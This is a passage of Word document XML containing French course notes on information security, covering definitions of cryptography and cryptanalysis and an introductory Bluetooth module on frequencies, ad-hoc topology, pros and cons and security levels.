          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I =&gt; Intégrité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0A760" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C =&gt; Confidentialité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B1F280" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">P =&gt; Preuve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(identification / non-répudiation / tracabilité)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B11687" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6EBA26F6" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7675971C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="1833152B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Chapitre 2 : Cryptographie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABFE02B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="2E07D1C0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Science mathématique permettant d’effectuer des opérations sur un texte intelligible afin d’assurer une ou plusieurs propriétés de la sécurité de l’information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D067D9A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0D6864" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066AB074" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460009D0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8548D5" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="00826D46" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptanalyse </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3647C5CE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7A7C530A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">La science permettant d’étudier les systèmes cryptographiques en vue de les tester ou de les causer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A935B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7543D31C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4606DD32" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="00826D46" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00826D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptologie </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060A31B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="665DF169" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">La science qui regroupe la cryptographie et cryptanalyse. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D034899" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4204EE4C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="5236B5D8" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDD95AB" wp14:editId="62C39B55">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17EB1050" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="63394997" w14:textId="602733F3" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:r>
        <w:t>Module 13 </w:t>
      </w:r>
      <w:r w:rsidR="00137BEB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C91DE4" w14:textId="46D23157" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre 1 : Qu’est-ce que le Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C8D37" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="50126B91" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6DB58BCA" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">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68C0B6B9" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442EB83D" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’objectif du Bluetooth est de transmettre des données ou de la voix entre des équipements possédants un circuit radio de faible coût. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EDE9E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058F20CE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le Bluetooth utilisant des ondes radio c’est pour cette raison que placer un objet, voire un mur entre l’émetteur et le récepteur n’empêche en aucun cas sa bonne transmission </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(2.4Ghz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA244C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">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577F70EB" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="4F1BC422" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7740213E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="72484001" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 GHz </w:t>
      </w:r>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(wifi, bluetooth, four à micr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>o-onde)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CC6990" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5 GHz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(wifi)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA9540" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">433 MHz </w:t>
      </w:r>
      <w:r w:rsidRPr="00E861EC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>(badyphones, alamres domotique, L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>oRa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C8D39" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">868 MHz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>(domotique, SigFox, LoRa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A027670" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B86590B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C12B0DF" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre 2 : La topologie du réseau </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4418257E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6D631B60" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bluetooth est un réseau de type « ad-hoc »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E3275" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il est auto-configurable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37825A4B" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="1ECEB408" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les nœuds peuvent changer des données uniquement lorsqu’ils sont à portée de réception l’un par rapport à l’autre </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD6700" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC571E0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>L’envoi d’information s’effectue par paquet lors des communication IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE500E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7141ECF8" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chaque machine peut échanger des informations avec n’importe quelle machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092CD5AA" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="180DA012" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="5DC286B0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="007C221C" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="0AB5F7F7" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D96B0A9" wp14:editId="09041166">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01F67309" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A7CB80" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E36E649" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B2D67DF" w14:textId="46C30A2C" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre </w:t>
      </w:r>
      <w:r w:rsidR="003214B9">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="003214B9">
        <w:t>pros &amp; cons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F69854" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avantage </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3E787A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="69A0AF5E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Largement utilisé techno connus et maitrisé </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54749B30" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gratuite et fiable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18726BD0" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Taux de transferts augmenter par rapport à l’infra-rouge </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789EC933" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Faible puissance électrice avec un faible protocole aérien </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99A408" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045609F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Inconvénients </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736C682" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="0045609F" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6A4FF4" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="0045609F" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045609F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>La fréquence radio (RF) Bluetooth sont plus ouverts à l'interception et aux attaques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A1E9A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="0045609F" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045609F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Taux de transfert de données petit par rapport au WiFi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4E76A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="0045609F" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045609F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Problèmes de communications, surtout entre des appareils de marque différente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEEB5E2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="007C221C" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="59C479EA" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="6185E58A" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="68C3CFAC" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="3B02F2F2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="7B2EF23F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="53104DE7" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="338969DD" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="39AF200C" w14:textId="77777777" w:rsidR="006100AD" w:rsidRPr="0045609F" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="0E6D4142" w14:textId="57DAB393" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapitre </w:t>
      </w:r>
      <w:r w:rsidR="003214B9">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t> : Sécurité</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D2CBD" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="475A0522" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t xml:space="preserve">Il y a trois niveaux de sécurité dans le Bluetooth : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383C536" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="51319CFB" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pas de gestion de sécurité </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77602664" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Gestion de la sécurité au niveau applicatif </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(identification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EADC908" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gestion de sécurité au niveau liaison Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0617BE" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mise en place d’un processus d’authentification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C993B7" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="135"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Suivi ou non par un chiffrent à l’aide de clés privés </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50349617" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="0C6EDC8E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="140FFD9E" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="44815B8F" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:r>
        <w:t>L’algorithme de sécurité utilise :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A24987" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD"/>
    <w:p w14:paraId="39EB8BF2" w14:textId="77777777" w:rsidR="006100AD" w:rsidRDefault="006100AD" w:rsidP="006100AD">
      <w:pPr>
